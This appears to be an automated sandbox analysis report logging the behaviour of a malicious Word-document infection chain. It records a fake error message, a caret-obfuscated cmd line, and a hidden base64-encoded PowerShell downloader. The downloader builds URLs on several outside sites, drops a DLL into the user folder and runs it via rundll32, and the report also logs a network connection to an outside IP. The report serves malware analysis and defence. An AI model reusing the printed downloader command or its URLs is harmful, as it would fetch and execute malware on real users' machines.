                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2960Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_001F109C FindFirstFileW,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: powershell.exe, 00000005.00000002.2096378240.00000000000A4000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0025C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001EC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001EC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001EC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0022C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0028C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0022C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0023C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0070C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_0030C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_0029C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_001FC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001B30 SetLastError,SetLastError,VirtualAlloc,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007F07 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 5.2.136.90 80
                      Encrypted powershell cmdline option foundShow sources
                      Source: unknownProcess created: Base64 decoded $95XUcD = [TYpE]("{0}{2}{4}{3}{1}" -f'SYSTe','CTORy','M','RE','.io.dI') ; sET-ItEm ('V'+'ariABLe'+':FIU') ( [typE]("{1}{4}{0}{6}{5}{3}{2}" -f'M.nET.SeR','sYst','TMaNAGer','N','E','I','vIcEPo'));$ErrorActionPreference = ('Si'+('le'+'n')+('t'+'lyC')+('o'+'nt')+('i'+'nue'));$Hc6c6uy=$I76C + [char](64) + $T36S;$V06B=('I3'+'9H'); (gcI ("VA"+"riAB"+"l"+"E:95"+"XuCd") ).VaLUe::"cReaT`Ed`IR`E`CTORY"($HOME + (('{0}C3re'+'5c3{0}'+'Di'+'_p'+'3'+'c9'+'{0}')-f [CHAR]92));$D15B=(('G2'+'8')+'O'); $fiu::"se`c`UrITYpRoTO`cOL" = (('T'+'ls')+'12');$R32F=('G'+('16'+'Z'));$C7zi9uu = ('O'+('_'+'5Z'));$W_1D=('E'+('19'+'T'));$W7io0wg=$HOME+(('{0}'+('C'+'3re5')+'c3'+'{'+'0}Di_p3c'+'9{'+'0}')-F[Char]92)+$C7zi9uu+('.d'+'ll');$H36A=('R'+('6_'+'O'));$Gr6x_h_=((']a'+'nw[3'+':/')+'/'+('p'+'etaf')+('ilm'+'.co')+'m'+('/w'+'p')+('-a'+'dm'+'in'+'/4m/@]')+'a'+('n'+'w[3'+'://gi'+'vi')+('ng'+'tha'+'nksd')+'ai'+'l'+('y.c'+'om/qlE/VeF/'+'@]a'+'n')+('w'+'[3://w')+('ap'+'.')+'zh'+('ong'+'l')+'i'+('sc'+'.c'+'o'+'m/wp-inc')+('lu'+'des'+'/Qr'+'yC')+'B/'+'@'+(']'+'anw')+('[3'+'s:/'+'/f'+'n'+'jbq.com/wp-i')+('nc'+'lude'+'s/')+('r'+'lR/@'+']anw['+'3s'+'://sak')+('h'+'isuh'+'an')+'i'+('n'+'arije')+('evik'+'a.')+('c'+'om/')+'w'+('p'+'-i')+('nc'+'lud')+('es'+'/CvG')+('U'+'jvE/@]'+'anw[3:'+'/')+('/'+'z'+'ieflix')+('.'+'tele'+'sk'+'o'+'pstore.co'+'m')+'/c'+'gi'+('-'+'bin')+('/G'+'t3S/@')+']'+'an'+('w['+'3')+'s:'+('//somanap.co'+'m/wp'+'-ad'+'m')+('in'+'/')+'P/')."rePL`AcE"(((']a'+'nw')+'['+'3'),([array]('sd','sw
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $95XUcD = [TYpE]("{0}{2}{4}{3}{1}" -f'SYSTe','CTORy','M','RE','.io.dI') ; sET-ItEm ('V'+'ariABLe'+':FIU') ( [typE]("{1}{4}{0}{6}{5}{3}{2}" -f'M.nET.SeR','sYst','TMaNAGer','N','E','I','vIcEPo'));$ErrorActionPreference = ('Si'+('le'+'n')+('t'+'lyC')+('o'+'nt')+('i'+'nue'));$Hc6c6uy=$I76C + [char](64) + $T36S;$V06B=('I3'+'9H'); (gcI ("VA"+"riAB"+"l"+"E:95"+"XuCd") ).VaLUe::"cReaT`Ed`IR`E`CTORY"($HOME + (('{0}C3re'+'5c3{0}'+'Di'+'_p'+'3'+'c9'+'{0}')-f [CHAR]92));$D15B=(('G2'+'8')+'O'); $fiu::"se`c`UrITYpRoTO`cOL" = (('T'+'ls')+'12');$R32F=('G'+('16'+'Z'));$C7zi9uu = ('O'+('_'+'5Z'));$W_1D=('E'+('19'+'T'));$W7io0wg=$HOME+(('{0}'+('C'+'3re5')+'c3'+'{'+'0}Di_p3c'+'9{'+'0}')-F[Char]92)+$C7zi9uu+('.d'+'ll');$H36A=('R'+('6_'+'O'));$Gr6x_h_=((']a'+'nw[3'+':/')+'/'+('p'+'etaf')+('ilm'+'.co')+'m'+('/w'+'p')+('-a'+'dm'+'in'+'/4m/@]')+'a'+('n'+'w[3'+'://gi'+'vi')+('ng'+'tha'+'nksd')+'ai'+'l'+('y.c'+'om/qlE/VeF/'+'@]a'+'n')+('w'+'[3://w')+('ap'+'.')+'zh'+('ong'+'l')+'i'+('sc'+'.c'+'o'+'m/wp-inc')+('lu'+'des'+'/Qr'+'yC')+'B/'+'@'+(']'+'anw')+('[3'+'s:/'+'/f'+'n'+'jbq.com/wp-i')+('nc'+'lude'+'s/')+('r'+'lR/@'+']anw['+'3s'+'://sak')+('h'+'isuh'+'an')+'i'+('n'+'arije')+('evik'+'a.')+('c'+'om/')+'w'+('p'+'-i')+('nc'+'lud')+('es'+'/CvG')+('U'+'jvE/@]'+'anw[3:'+'/')+('/'+'z'+'ieflix')+('.'+'tele'+'sk'+'o'+'pstore.co'+'m')+'/c'+'gi'+('-'+'bin')+('/G'+'t3S/@')+']'+'an'+('w['+'3')+'s:'+('//somanap.co'+'m/wp'+'-ad'+'m')+('in'+'/')+'P/')."rePL`AcE"(((']a'+'nw')+'['+'3'),([array]('sd','sw
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cgjbbwbf\qqtudgd.huj',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nkqiqdbodnub\wtlcjwyiszo.kcs',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zersybwlygjod\ujnaefcctevs.wag',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gocmtvldv\plpbjoam.bfk',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uyxqa\ucgv.gdq',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nxixsue\ekwnwx.zgx',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vgjjq\jcse.fro',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kggdchrkalohz\pkgboheoanvf.hox',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jhnbwsyvosmob\uzkhbqpbyyqm.xoq',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ulduktzjxplnmpb\xnnmpmxkpltkbl.ghw',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ohslgtw\xeprri.cyh',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Adumhgbkvoz\tdxrpdrtbm.quu',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fnniqydokod\xeqkvdqlhe.bce',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wpjypezem\yvgznbmd.qnx',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAA